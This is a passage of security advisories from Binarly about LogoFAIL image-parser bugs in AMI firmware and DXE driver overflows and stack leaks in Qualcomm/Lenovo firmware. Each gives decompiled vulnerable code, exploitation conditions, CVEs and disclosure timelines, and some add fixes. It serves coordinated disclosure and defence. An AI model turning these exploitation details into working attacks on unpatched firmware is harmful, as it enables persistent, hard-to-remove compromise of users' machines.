After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 89 | 90 | | Disclosure Activity | Date (YYYY-mm-dd) | 91 | | -------------------------------------- | ----------------- | 92 | | Lenovo PSIRT is notified | 2023-06-21 | 93 | | Lenovo ID (LEN-132940) is assigned | 2023-06-22 | 94 | | CERT/CC is notified | 2023-07-10 | 95 | | AMI PSIRT confirmed reported issues | 2023-10-05 | 96 | | AMI PSIRT assigned CVE ID | 2023-12-01 | 97 | | BINARLY public disclosure date | 2024-06-19 | 98 | 99 | ## Acknowledgements 100 | 101 | **BINARLY efiXplorer team** 102 | -------------------------------------------------------------------------------- /LogoFAIL/BRLY-LOGOFAIL-2023-020.md: -------------------------------------------------------------------------------- 1 | # [BRLY-LOGOFAIL-2023-020] 2 | 3 | # Memory Corruption vulnerability in DXE driver. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a lack of array index validation leading to OOB Write operations on global data during JPEG file processing in AMI firmware. 8 | 9 | ## Vulnerability Information 10 | 11 | - BINARLY internal vulnerability identifier: BRLY-LOGOFAIL-2023-020 12 | - AMI PSIRT assigned CVE identifier: CVE-2023-39538 13 | - CVSS v3.1: 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 14 | 15 | ## Affected modules with confirmed impact by Binarly team 16 | 17 | | Module name | Module GUID | Module SHA256 | 18 | | ------------- | ------------------------------------ | ---------------------------------------------------------------- | 19 | | AMITSE | b1da0adf-4f77-4070-a88e-bffe1c60529a | 439e73d391b7f7540f6faa58afdc2722bda250468d4a4f7f5f84228c1f77ddbe | 20 | 21 | ## Potential impact 22 | 23 | An attacker with local access can exploit this vulnerability to elevate privileges from ring 3 or ring 0 (depends on the operating system) to a DXE driver and execute arbitrary code. Malicious code installed as a result of this exploitation could survive operating system (OS) boot process and runtime, or modify NVRAM area on the SPI flash storage (to gain persistence). Additionally, threat actors could use this vulnerability to bypass OS security mechanisms (modify privileged memory or runtime variables), influence OS boot process, and in some cases allow an attacker to hook or modify EFI Runtime services. 24 | 25 | ## Vulnerability description 26 | 27 | The pseudocode of the vulnerable function is shown below: 28 | 29 | ```c 30 | __int64 __fastcall CreateHuffmanTable(WORD *a1, BYTE *a2) 31 | { 32 | int v2; // ebx 33 | WORD v3; // r10 34 | __int64 index; // r8 35 | BYTE *v5; // rdx 36 | unsigned __int8 v6; // r11 37 | BYTE *v7; // rdi 38 | int v8; // r9d 39 | __int64 index_plus_1; // r8 40 | WORD v10; // ax 41 | __int64 result; // rax 42 | 43 | v2 = 0; 44 | v3 = 0; 45 | index = 0i64; 46 | v5 = a2 + 1; 47 | v6 = 1; 48 | v7 = v5; 49 | do 50 | { 51 | v8 = *v5; 52 | if ( *v5 ) 53 | { 54 | v2 += v8 + 2 * v8; 55 | do 56 | { 57 | // BRLY-LOGOFAIL-2023-020: index is not checked and can lead to OOB write to the statically-allocated global buffer pointer by a1 58 | a1[index] = v6; 59 | --v8; 60 | index_plus_1 = index + 1; 61 | a1[index_plus_1++] = v3; 62 | v10 = v7[16]; 63 | ++v3; 64 | ++v7; 65 | a1[index_plus_1] = v10; 66 | index = index_plus_1 + 1; 67 | } 68 | while ( v8 > 0 ); 69 | } 70 | v3 *= 2; 71 | ++v5; 72 | ++v6; 73 | } 74 | while ( v6 <= 0x10u ); 75 | result = v2; 76 | a1[v2] = 17; 77 | return result; 78 | } 79 | ``` 80 | 81 | As we can see from the pseudocode, the `index` variable is used to access the array pointed by `a1` without any bounds checking. The attacker indirectly controls `index` since it is incremented on every iteration of the loop depending on `v8` which is read directly from the attacker controlled image. Since this function receives a statically allocated array: 82 | ``` 83 | ... 84 | v15 = &unk_96580; 85 | result = CreateHuffmanTable(v15, *v13); 86 | ... 87 | ``` 88 | the attacker can write after the end of this array and corrupt other global data. 89 | 90 | ## Disclosure timeline 91 | 92 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 93 | 94 | | Disclosure Activity | Date (YYYY-mm-dd) | 95 | | -------------------------------------- | ----------------- | 96 | | Lenovo PSIRT is notified | 2023-06-21 | 97 | | Lenovo ID (LEN-132940) is assigned | 2023-06-22 | 98 | | CERT/CC is notified | 2023-07-10 | 99 | | AMI PSIRT confirmed reported issues | 2023-10-05 | 100 | | AMI PSIRT assigned CVE ID | 2023-12-01 | 101 | | BINARLY public disclosure date | 2024-06-19 | 102 | 103 | ## Acknowledgements 104 | 105 | **BINARLY efiXplorer team** 106 | -------------------------------------------------------------------------------- /LogoFAIL/BRLY-LOGOFAIL-2023-021.md: -------------------------------------------------------------------------------- 1 | # [BRLY-LOGOFAIL-2023-021] 2 | 3 | # Out-of-bounds Read in DXE driver. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a OOB Read vulnerability in DXE driver. Improper validation on JPEG marker length leads to multiple OOB Read operations during JPEG file processing in AMI firmware 8 | 9 | ## Vulnerability Information 10 | 11 | - BINARLY internal vulnerability identifier: BRLY-LOGOFAIL-2023-021 12 | - CVSS v3.1: 3.2 Low AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N 13 | 14 | ## Affected modules with confirmed impact by Binarly team 15 | 16 | | Module name | Module GUID | Module SHA256 | 17 | | ------------- | ------------------------------------ | ---------------------------------------------------------------- | 18 | | AMITSE | b1da0adf-4f77-4070-a88e-bffe1c60529a | 439e73d391b7f7540f6faa58afdc2722bda250468d4a4f7f5f84228c1f77ddbe | 19 | 20 | ## Potential impact 21 | 22 | This vulnerability will not lead to exploitation, however, it may lead to unexpected behaviour during JPEG file processing. 23 | 24 | ## Vulnerability description 25 | 26 | The pseudocode of the vulnerable function is shown below: 27 | 28 | ```c 29 | __int64 __fastcall GetDimensions(_BYTE *Image) 30 | { 31 | char v2; // di 32 | unsigned __int8 v3; // r10 33 | unsigned __int8 v4; // bl 34 | unsigned __int8 MarkerType; // cl 35 | __int64 v6; // rax 36 | __int64 v8; // rax 37 | char v9; // al 38 | _BYTE *v10; // rdx 39 | _QWORD *v11; // r8 40 | unsigned __int8 v12; // r9 41 | __int64 v13; // rdx 42 | __int64 v14; // r11 43 | unsigned __int16 Len; // [rsp+30h] [rbp+8h] 44 | 45 | v2 = 0; 46 | v3 = 0; 47 | v4 = 0; 48 | if ( *Image != 0xFF || Image[1] != 0xD8 ) 49 | return 0i64; 50 | while ( 1 ) 51 | { 52 | MarkerType = Image[1]; 53 | if ( MarkerType != 0xD8 ) 54 | break; 55 | Image += 2; 56 | LABEL_27: 57 | if ( *Image != 0xFF ) 58 | return 0i64; 59 | } 60 | if ( MarkerType == 0xD9 ) 61 | goto LABEL_30; 62 | if ( !MarkerType ) 63 | return 0i64; 64 | if ( (MarkerType & 0xF0) == 0xE0 ) 65 | { 66 | LABEL_26: 67 | v9 = Image[3]; 68 | v10 = Image + 2; 69 | LOBYTE(Len) = v9; 70 | HIBYTE(Len) = *v10; 71 | // BRLY-LOGOFAIL-2023-021: Image pointer is updated with value coming from the image (Len), without validation 72 | Image = &v10[Len]; 73 | goto LABEL_27; 74 | } 75 | if ( MarkerType == 0xC0 ) 76 | { 77 | v2 |= 2u; 78 | qword_95FC0 = (Image + 2); 79 | goto LABEL_26; 80 | } 81 | if ( MarkerType == 0xC4 ) 82 | { 83 | v6 = v3++; 84 | qword_96560[v6] = (Image + 4); 85 | goto LABEL_26; 86 | } 87 | if ( (MarkerType & 0xF0) == 0xC0 ) 88 | { 89 | if ( MarkerType > 0xC0u && MarkerType < 0xD0u ) 90 | return 0i64; 91 | goto LABEL_26; 92 | } 93 | if ( MarkerType != 0xDA ) 94 | { 95 | if ( MarkerType == 0xDB ) 96 | { 97 | v8 = v4++; 98 | qword_95EA0[v8] = (Image + 4); 99 | } 100 | else if ( MarkerType == 0xDD ) 101 | { 102 | LOBYTE(word_95490) = Image[5]; 103 | HIBYTE(word_95490) = Image[4]; 104 | } 105 | else if ( (MarkerType & 0xF8) != 0xD0 106 | && (MarkerType == 0xDC || MarkerType == 0xDE || MarkerType == 0xDF || (MarkerType + 16) > 0xEu) ) 107 | { 108 | return 0i64; 109 | } 110 | goto LABEL_26; 111 | } 112 | qword_95F10 = (Image + 14); 113 | LABEL_30: 114 | if ( v4 == 1 ) 115 | { 116 | v4 = 2; 117 | qword_95EA8 = qword_95EA0[0] + 65; 118 | } 119 | if ( v3 == 1 ) 120 | { 121 | v11 = &unk_96568; 122 | do 123 | { 124 | v12 = 0; 125 | v13 = 0i64; 126 | v14 = qword_96560[v3 - 1]; 127 | do 128 | v12 += *(v14 + v13++ + 1); 129 | while ( v13 < 16 ); 130 | ++v3; 131 | *v11++ = v12 + v14 + 17; 132 | } 133 | while ( v3 < 4u ); 134 | } 135 | if ( v3 != 4 || v4 != 2 || (v2 & 2) == 0 ) 136 | return 0i64; 137 | sub_5D26C(2u, 4u); 138 | return 1i64; 139 | } 140 | ``` 141 | 142 | As we can see from the pseudocode, the JPEG Marker length, read from the image and stored in variable `Len`, is used to update the value of `ImagePtr` without any validation. The attacker can arbitrarly set `wLen` thus making `ImagePtr` point anywhere in memory. 143 | 144 | ## Disclosure timeline 145 | 146 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 147 | 148 | | Disclosure Activity | Date (YYYY-mm-dd) | 149 | | -------------------------------------- | ----------------- | 150 | | Lenovo PSIRT is notified | 2023-06-21 | 151 | | Lenovo ID (LEN-132940) is assigned | 2023-06-22 | 152 | | CERT/CC is notified | 2023-07-10 | 153 | | AMI PSIRT confirmed reported issues | 2023-10-05 | 154 | | AMI PSIRT assigned CVE ID | 2023-12-01 | 155 | | BINARLY public disclosure date | 2024-06-19 | 156 | 157 | ## Acknowledgements 158 | 159 | **BINARLY efiXplorer team** 160 | -------------------------------------------------------------------------------- /LogoFAIL/BRLY-LOGOFAIL-2023-023.md: -------------------------------------------------------------------------------- 1 | # [BRLY-LOGOFAIL-2023-023] 2 | 3 | # Memory Corruption vulnerability in DXE driver. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a lack of validation on output buffer leads to OOB Write operations during GIF file processing in AMI firmware. 8 | 9 | ## Vulnerability Information 10 | 11 | - BINARLY internal vulnerability identifier: BRLY-LOGOFAIL-2023-023 12 | - AMI PSIRT assigned CVE identifier: CVE-2023-39538 13 | - CVSS v3.1: 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 14 | 15 | ## Affected modules with confirmed impact by Binarly team 16 | 17 | | Module name | Module GUID | Module SHA256 | 18 | | ------------- | ------------------------------------ | ---------------------------------------------------------------- | 19 | | AMITSE | b1da0adf-4f77-4070-a88e-bffe1c60529a | 439e73d391b7f7540f6faa58afdc2722bda250468d4a4f7f5f84228c1f77ddbe | 20 | 21 | ## Potential impact 22 | 23 | An attacker with local access can exploit this vulnerability to elevate privileges from ring 3 or ring 0 (depends on the operating system) to a DXE driver and execute arbitrary code. Malicious code installed as a result of this exploitation could survive operating system (OS) boot process and runtime, or modify NVRAM area on the SPI flash storage (to gain persistence). Additionally, threat actors could use this vulnerability to bypass OS security mechanisms (modify privileged memory or runtime variables), influence OS boot process, and in some cases allow an attacker to hook or modify EFI Runtime services. 24 | 25 | ## Vulnerability description 26 | 27 | The pseudocode of the vulnerable function is shown below: 28 | 29 | ```c 30 | __int64 __fastcall EmitPixel(unsigned __int8 PixelValue) 31 | { 32 | int v1; // r9d 33 | __int64 v2; // rdx 34 | __int64 v3; // rcx 35 | _BYTE *v4; // r8 36 | unsigned int v5; // r9d 37 | unsigned int v6; // ecx 38 | __int64 result; // rax 39 | unsigned int v8; // r9d 40 | 41 | v1 = Mult; 42 | if ( PixelValue != dword_7FC20 ) 43 | { 44 | v2 = PixelValue; 45 | v3 = GIFColorMap; 46 | // BRLY-LOGOFAIL-2023-023 47 | v4 = (Buffer + (4 * Mult)); 48 | *v4 = *(GIFColorMap + 4 * v2); 49 | v4[1] = *(v3 + 4 * v2 + 1); 50 | v4[2] = *(v3 + 4 * v2 + 2); 51 | v4[3] = 0; 52 | } 53 | v5 = v1 + 1; 54 | Mult = v5; 55 | if ( ++dword_8CB80 > dword_94FF8 ) 56 | { 57 | dword_8CB80 = dword_95480; 58 | if ( dword_94FE0 ) 59 | { 60 | v6 = *(&dword_86C48 + &_ImageBase[2 * dword_95000]) + dword_8CB84; 61 | dword_8CB84 = v6; 62 | if ( v6 <= dword_94FEC ) 63 | { 64 | LABEL_9: 65 | v5 = dword_95480 + dword_94BB0 + dword_7FC24 * (v6 + dword_95470); 66 | Mult = v5; 67 | goto LABEL_10; 68 | } 69 | v6 = dword_94FE4 + *(&dword_86C30 + &_ImageBase[2 * ++dword_95000]); 70 | } 71 | else 72 | { 73 | v6 = dword_8CB84 + 1; 74 | } 75 | dword_8CB84 = v6; 76 | goto LABEL_9; 77 | } 78 | LABEL_10: 79 | result = dword_94BC8; 80 | v8 = HIWORD(v5); 81 | if ( dword_94BC8 != v8 ) 82 | result = v8; 83 | dword_94BC8 = result; 84 | return result; 85 | } 86 | ``` 87 | 88 | As we can see from the pseudocode, the global variable `Buffer` is a buffer allocated for storing decoded GIF pixels. However this `Buffer` is used without any bounds checking, thus allowing the attacker to trigger a heap overflow when `fp` is used to write a pixel colors. 89 | 90 | ## Disclosure timeline 91 | 92 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 93 | 94 | | Disclosure Activity | Date (YYYY-mm-dd) | 95 | | -------------------------------------- | ----------------- | 96 | | Lenovo PSIRT is notified | 2023-06-21 | 97 | | Lenovo ID (LEN-132940) is assigned | 2023-06-22 | 98 | | CERT/CC is notified | 2023-07-10 | 99 | | AMI PSIRT confirmed reported issues | 2023-10-05 | 100 | | AMI PSIRT assigned CVE ID | 2023-12-01 | 101 | | BINARLY public disclosure date | 2024-06-19 | 102 | 103 | ## Acknowledgements 104 | 105 | **BINARLY efiXplorer team** 106 | -------------------------------------------------------------------------------- /Qualcomm/BRLY-2022-030.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2022-030] 2 | 3 | # The stack buffer overflow vulnerability leads to arbitrary code execution during DXE phase. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a stack buffer overflow vulnerability that allows an attacker to execute arbitrary code. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2022-030 12 | * Qualcomm PSIRT assigned CVE identifier: [CVE-2022-40517](https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2023-bulletin.html) 13 | * CVSS v3.1 Score 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 14 | 15 | ## Affected Lenovo firmware with confirmed impact by Binarly team 16 | 17 | | Firmware | Module name | Module SHA256 | File GUID | 18 | | --- | --- | --- | --- | 19 | | `N3HET53W/$0AN3H00.FL1` | PILDxe | 95b3cab1f1ee002ece2a7675f89fe8b0bdcf62b528cfb6ed371170b45ff407a7 | 1d317734-4083-47c6-83ea-e3a42f2a6bff | 20 | 21 | ## Potential impact 22 | 23 | An attacker with local privileged access can exploit this vulnerability to elevate privileges from ring 3 or ring 0 (depends on the operating system) to a DXE Runtime UEFI application and execute arbitrary code. 24 | A malicious code installed as a result of the vulnerability exploitation in a DXE driver could survive across an operating system (OS) boot process and runtime or modify NVRAM area on SPI flash storage (to gain persistence on target platform). 25 | Additionally, this vulnerability potentially could be used by threat actors to bypass OS security mechanisms (modify privileged memory or runtime variables), influence on the OS boot process, and in some cases would allow an attacker to hook or modify EFI Runtime services. 26 | 27 | ## Vulnerability description 28 | 29 | The vulnerability exists in the function located at offset `0x3F5C` in the binary. 30 | Consider the following code snippet: 31 | 32 | ```c 33 | ... 34 | AsciiStrToUnicodeStr(&Name, VariableName); 35 | StrCatS(VariableName, 0x80, L".Type"); 36 | Flag = 0; 37 | if ( !(gRT->GetVariable)(VariableName, &gVariableGuid, 0, &DataSize, VariableValue) ) 38 | { 39 | Flag = 1; 40 | dword_1E630 = VariableValue[0]; 41 | } 42 | AsciiStrToUnicodeStr(&Name, VariableName); 43 | StrCatS(VariableName, 0x80, L".FwName"); 44 | if ( !(gRT->GetVariable)(VariableName, &gVariableGuid, 0, &DataSize, VariableValue) ) 45 | { 46 | sub_9B38(word_1E634, 0x1F, VariableValue, 0x1F); 47 | Flag = 1; 48 | } 49 | AsciiStrToUnicodeStr(&Name, VariableName); 50 | StrCatS(VariableName, 0x80, L".PartiLabel"); 51 | if ( !(gRT->GetVariable)(VariableName, &gVariableGuid, 0, &DataSize, VariableValue) ) 52 | { 53 | sub_9B38(word_1E674, 0x1F, VariableValue, 0x1F); 54 | Flag = 1; 55 | } 56 | AsciiStrToUnicodeStr(&Name, VariableName); 57 | StrCatS(VariableName, 0x80, L".PartiRootGuid"); 58 | if ( !(gRT->GetVariable)(VariableName, &gVariableGuid, 0, &DataSize, VariableValue) ) 59 | { 60 | sub_8E98(&byte_1E6B4, VariableValue); 61 | Flag = 1; 62 | } 63 | AsciiStrToUnicodeStr(&Name, VariableName); 64 | StrCatS(VariableName, 0x80, L".PartiGuid"); 65 | if ( !(gRT->GetVariable)(VariableName, &gVariableGuid, 0, &DataSize, VariableValue) ) 66 | { 67 | sub_8E98(&byte_1E6C4, VariableValue); 68 | Flag = 1; 69 | } 70 | AsciiStrToUnicodeStr(&Name, VariableName); 71 | StrCatS(VariableName, 0x80, L".ImagePath"); 72 | if ( !(gRT->GetVariable)(VariableName, &gVariableGuid, 0, &DataSize, VariableValue) ) 73 | { 74 | sub_9B38(word_1E6D4, 0x1F, VariableValue, 0x1F); 75 | Flag = 1; 76 | } 77 | ... 78 | ``` 79 | 80 | As we can see from the pseudocode, `DataSize` does not initialized before each call to `gRT->GetVariable()`. In this case a potential attacker can trigger the stack buffer overflow and execute the arbitrary code. This requires changing two NVRAM variable values: the first to override `DataSize` and the second to overwrite the return address. 81 | 82 | In order to fix this vulnerability, the `DataSize` variable must be initialized before each call to `gRT->GetVariable()`. 83 | 84 | ## Disclosure timeline 85 | 86 | This vulnerability is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the vulnerability report will become visible to the public. 87 | 88 | | Disclosure Activity | Date (YYYY-mm-dd) | 89 | | ---------------------------------------- | ----------------- | 90 | | Qualcomm PSIRT is notified | 2022-10-21 | 91 | | Qualcomm PSIRT confirmed reported issue | 2022-10-30 | 92 | | Qualcomm PSIRT assigned CVE number | 2022-12-19 | 93 | | Qualcomm PSIRT provide patch release | 2023-01-03 | 94 | | BINARLY public disclosure date | 2023-01-09 | 95 | 96 | ## Acknowledgements 97 | 98 | **BINARLY efiXplorer team** 99 | -------------------------------------------------------------------------------- /Qualcomm/BRLY-2022-031.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2022-031] 2 | 3 | # The stack memory leak vulnerability in DXE driver. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a stack memory leak vulnerability that allows a potential attacker to write stack memory to NVRAM variable. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2022-031 12 | * Qualcomm PSIRT assigned CVE identifier: [CVE-2022-40518](https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2023-bulletin.html) 13 | * CVSS v3.1 Score 4.9 Medium AV:P/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N 14 | 15 | ## Affected Lenovo firmware with confirmed impact by Binarly team 16 | 17 | | Firmware | Module name | Module SHA256 | File GUID | 18 | | --- | --- | --- | --- | 19 | | `N3HET53W/$0AN3H00.FL1` | ResetRuntimeDxe | 7b2cd3ade54bdb24b93a878a226c50c5cff602e166ed1f978df381e43b487e6a | 3ae17db7-3cc5-4b89-9304-9549211057ef | 20 | 21 | ## Potential impact 22 | 23 | An attacker with local privileged access can exploit this vulnerability to read the contents of the stack and use this information to exploit other vulnerabilities in DXE. A malicious code installed as a result of the vulnerability exploitation in a DXE driver could survive across an operating system (OS) boot process and runtime or modify NVRAM area on SPI flash storage (to gain persistence on target platform). 24 | Additionally, this vulnerability potentially could be used by threat actors to bypass OS security mechanisms (modify privileged memory or runtime variables), influence on the OS boot process, and in some cases would allow an attacker to hook or modify EFI Runtime services. 25 | 26 | ## Vulnerability description 27 | 28 | The pseudocode of the vulnerable function is shown below: 29 | 30 | ```c 31 | __int64 sub_32C8() 32 | { 33 | int val; 34 | EFI_SET_VARIABLE SetVariable; 35 | int VariableValue; 36 | __int64 DataSize; 37 | 38 | DataSize = 4; 39 | if ( ExitBootServicesEventNotified() ) 40 | return 0; 41 | 42 | // The following code can only be executed before ExitBootServices 43 | if ( (gRT->GetVariable)(L"BSPowerCycles", &gVariableGuid, 0, &DataSize, &VariableValue) ) 44 | { 45 | val = 1; 46 | VariableValue = 0; 47 | } 48 | else 49 | { 50 | val = VariableValue + 1; 51 | } 52 | SetVariable = gRT->SetVariable; 53 | VariableValue = val; 54 | return (SetVariable)(L"BSPowerCycles", &gVariableGuid, 3, DataSize, &VariableValue); 55 | } 56 | ``` 57 | 58 | As we can see from the pseudocode, the `gRT->SetVariable()` service is called with the `DataSize` value, which can be overwritten inside the `gRT->GetVariable()` service. 59 | 60 | Thus, a potential attacker can write `X - 4` bytes from the stack to NVRAM if writes any buffer of length `X > 4` to the `BSPowerCycles` NVRAM variable. 61 | 62 | In order to fix this vulnerability, the `DataSize` variable must be initialized before `gRT->SetVariable()`: 63 | 64 | ```c 65 | ... 66 | SetVariable = gRT->SetVariable; 67 | VariableValue = val; 68 | DataSize = 4; 69 | return (SetVariable)(L"BSPowerCycles", &gVariableGuid, 3, DataSize, &VariableValue); 70 | ``` 71 | 72 | ## Disclosure timeline 73 | 74 | This vulnerability is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the vulnerability report will become visible to the public. 75 | 76 | | Disclosure Activity | Date (YYYY-mm-dd) | 77 | | ---------------------------------------- | ----------------- | 78 | | Qualcomm PSIRT is notified | 2022-10-21 | 79 | | Qualcomm PSIRT confirmed reported issue | 2022-10-30 | 80 | | Qualcomm PSIRT assigned CVE number | 2022-12-19 | 81 | | Qualcomm PSIRT provide patch release | 2023-01-03 | 82 | | BINARLY public disclosure date | 2023-01-09 | 83 | 84 | ## Acknowledgements 85 | 86 | **BINARLY efiXplorer team** 87 | -------------------------------------------------------------------------------- /Qualcomm/BRLY-2022-033.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2022-033] 2 | 3 | # Stack buffer overflow vulnerability leading to arbitrary code execution during DXE phase. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a stack buffer overflow vulnerability that allows an attacker to execute arbitrary code. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2022-033 12 | * Qualcomm PSIRT assigned CVE identifier: [CVE-2022-40520](https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2023-bulletin.html) 13 | * CVSS v3.1 Score 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 14 | 15 | ## Affected Lenovo firmware with confirmed impact by Binarly team 16 | 17 | | Firmware | Module name | Module SHA256 | File GUID | 18 | | --- | --- | --- | --- | 19 | | `N3HET74W/$0AN3H00.FL1` | UsbConfigDxe | 2184d4057ad439fa236c23d0f325fe91781c2c22b8ac67c8ebafe65a176e0298 | cd823a4d-7dec-4531-ae5d-4134fa4127b8 | 20 | 21 | ## Potential impact 22 | 23 | An attacker with local privileged access can exploit this vulnerability to elevate privileges from ring 3 or ring 0 (depends on the operating system) to a DXE Runtime UEFI application and execute arbitrary code. 24 | A malicious code installed as a result of the vulnerability exploitation in a DXE driver could survive across an operating system (OS) boot process and runtime or modify NVRAM area on SPI flash storage (to gain persistence on target platform). 25 | Additionally, this vulnerability potentially could be used by threat actors to bypass OS security mechanisms (modify privileged memory or runtime variables), influence on the OS boot process, and in some cases would allow an attacker to hook or modify EFI Runtime services. 26 | 27 | ## Vulnerability description 28 | 29 | The pseudocode of the vulnerable function is shown below: 30 | 31 | ```c 32 | __int64 sub_66E8() 33 | { 34 | // ... 35 | 36 | __int64 DataSize; 37 | unsigned __int8 Value; 38 | int v31; 39 | __int64 v32; 40 | unsigned int v33; 41 | __int64 result; 42 | 43 | result = 0; 44 | v33 = 1; 45 | v32 = 32; 46 | v31 = 32; 47 | DataSize = 1; 48 | result = gRT->GetVariable(L"UsbConfigPrimaryPort", &gVariableGuid, 0, &DataSize, &Value); 49 | if ( result >= 0 ) 50 | LODWORD(v32) = sub_6528(Value); 51 | else 52 | LODWORD(v32) = 32; 53 | result = gRT->GetVariable(L"UsbConfigSecondaryPort", &gVariableGuid, 0, &DataSize, &Value); 54 | 55 | // ... 56 | } 57 | ``` 58 | 59 | As we can see from the pseudocode, `DataSize` is initialized only once (before the first call to `gRT->GetVariable()`). 60 | 61 | Thus, if the data size of the variable in NVRAM is greater than 1, DataSize will be overwritten. Thus, the next call to `gRT-GetVariable()` may cause an overflow on the stack (and subsequent execution of arbitrary code). 62 | 63 | In order to fix this vulnerability, the `DataSize` variable must be (re)initialized before each call to `gRT->GetVariable()`: 64 | 65 | ```c 66 | // ... 67 | 68 | DataSize = 1; 69 | result = gRT->GetVariable(L"UsbConfigPrimaryPort", &gVariableGuid, 0, &DataSize, &Value); 70 | if ( result >= 0 ) 71 | LODWORD(v32) = sub_6528(Value); 72 | else 73 | LODWORD(v32) = 32; 74 | 75 | DataSize = 1; // <--- added 76 | result = gRT->GetVariable(L"UsbConfigSecondaryPort", &gVariableGuid, 0, &DataSize, &Value); 77 | 78 | // ... 79 | ``` 80 | 81 | ## Disclosure timeline 82 | 83 | This vulnerability is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the vulnerability report will become visible to the public. 84 | 85 | | Disclosure Activity | Date (YYYY-mm-dd) | 86 | | ---------------------------------------- | ----------------- | 87 | | Qualcomm PSIRT is notified | 2022-10-21 | 88 | | Qualcomm PSIRT confirmed reported issue | 2022-10-31 | 89 | | Qualcomm PSIRT assigned CVE number | 2022-12-19 | 90 | | Qualcomm PSIRT provide patch release | 2023-01-03 | 91 | | BINARLY public disclosure date | 2023-01-09 | 92 | 93 | ## Acknowledgements 94 | 95 | **BINARLY efiXplorer team** 96 | -------------------------------------------------------------------------------- /Qualcomm/BRLY-2022-036.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2022-036] 2 | 3 | # The stack memory leak vulnerability in DXE driver. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a stack memory leak vulnerability that allows a potential attacker to write stack memory to NVRAM variable. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2022-036 12 | * Qualcomm PSIRT assigned CVE identifier: [CVE-2022-40519](https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2023-bulletin.html) 13 | * CVSS v3.1 Score 6.0 Medium AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N 14 | 15 | ## Affected Lenovo firmware with confirmed impact by Binarly team 16 | 17 | | Firmware | Module name | Module SHA256 | File GUID | 18 | | --- | --- | --- | --- | 19 | | `N3HET74W/$0AN3H00.FL1` | QcomBds | 322526e3ede8a040c80e59f4384bd3965b5cb19cd20636b5a189213a807b9bd0 | 5A50AA81-C3AE-4608-A0E3-41A2E69BAF94 | 20 | 21 | ## Potential impact 22 | 23 | An attacker with local privileged access can exploit this vulnerability to read the contents of the stack and use this information to exploit other vulnerabilities in DXE. A malicious code installed as a result of the vulnerability exploitation in a DXE driver could survive across an operating system (OS) boot process and runtime or modify NVRAM area on SPI flash storage (to gain persistence on target platform). 24 | Additionally, this vulnerability potentially could be used by threat actors to bypass OS security mechanisms (modify privileged memory or runtime variables), influence on the OS boot process, and in some cases would allow an attacker to hook or modify EFI Runtime services. 25 | 26 | ## Vulnerability description 27 | 28 | The vulnerable functions is a part of protocol with GUID `d874d61a-4b87-7608-a00f-58add7052530`. 29 | The pseudocode of the vulnerable function is shown below: 30 | 31 | ```c 32 | __int64 sub_192A0() 33 | { 34 | EFI_GET_VARIABLE GetVariable; 35 | int ResValue; 36 | EFI_SET_VARIABLE SetVariable; 37 | int RunCyclesValue; 38 | __int64 DataSize; 39 | 40 | RunCyclesValue = 0; 41 | CheckHwErrRecSupport(); 42 | DataSize = 4; 43 | if ( (gRT->GetVariable)(L"MTC", &gVariableGuid, 0, &DataSize, &gMtcValue) ) 44 | gMtcValue = 0; 45 | GetVariable = gRT->GetVariable; 46 | DataSize = 4; 47 | if ( (GetVariable)(L"RunCycles", &gVariableGuid, 0, &DataSize, &RunCyclesValue) == EFI_NOT_FOUND ) 48 | { 49 | ResValue = 1; 50 | RunCyclesValue = 0; 51 | } 52 | else 53 | { 54 | ResValue = RunCyclesValue + 1; 55 | } 56 | SetVariable = gRT->SetVariable; 57 | RunCyclesValue = ResValue; 58 | (SetVariable)(L"RunCycles", &gVariableGuid, 7, DataSize, &RunCyclesValue); 59 | DataSize = 4; 60 | return (gRT->GetVariable)(L"RunCycles", &gVariableGuid, 0, &DataSize, &RunCyclesValue); 61 | } 62 | ``` 63 | 64 | As we can see from the pseudocode, for the `RunCycles` variable `gRT->SetVariable()` service is called with the `DataSize` value, which can be overwritten inside the `gRT->GetVariable()` service. 65 | 66 | Thus, a potential attacker can write `X - 4` bytes from the stack to NVRAM if writes any buffer of length `X > 4` to the `RunCycles` NVRAM variable. 67 | 68 | In order to fix this vulnerability, the `DataSize` variable must be initialized before `gRT->SetVariable()`. 69 | 70 | ## Disclosure timeline 71 